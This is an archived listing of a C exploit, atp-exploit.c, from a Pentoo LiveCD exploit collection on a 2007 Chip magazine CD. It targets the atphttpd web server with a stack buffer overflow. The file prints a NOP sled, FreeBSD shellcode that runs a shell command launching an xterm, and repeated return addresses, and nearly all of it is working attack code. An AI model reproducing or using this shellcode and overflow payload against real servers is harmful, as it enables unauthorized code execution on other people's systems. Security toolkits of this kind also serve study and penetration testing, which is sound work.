Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / atphttpd / atp-exploit.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2.0 KB | 45 lines

/* atphttpd exploit. / The exploit sucks, if you get it wrong the first time the server just dies / so I didnt bother adding any offset argument to the exploit. Also if you / change the IP addy you may have to change the alignment a little. / / http://www.badc0ded.com */ #define ret "\x78\xf5\xbf\xbf" char FreeBSD[]= /* stolen lsd-pl.net shellcode */ "\xeb\x25" /* jmp <cmdshellcode+39> */ "\x59" /* popl %ecx */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x66\x68""-c" /* pushw $0x632d */ "\x89\xe7" /* movl %esp,%edi */ "\x50" /* pushl %eax */ "\x51" /* pushl %ecx */ "\x57" /* pushl %edi */ "\x53" /* pushl %ebx */ "\x89\xe7" /* movl %esp,%edi */ "\x50" /* pushl %eax */ "\x57" /* pushl %edi */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x3b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ "\xe8\xd6\xff\xff\xff" /* call <cmdshellcode+2> */ "/usr/X11R6/bin/xterm -display 127.0.0.1:0;"; main () { int i; for (i=0;i<=501;i++) // this would be a good place to change alignment printf("\x90"); printf("%s",FreeBSD); for (i=0;i<=100;i++) printf("%s",ret); printf("\n\n"); }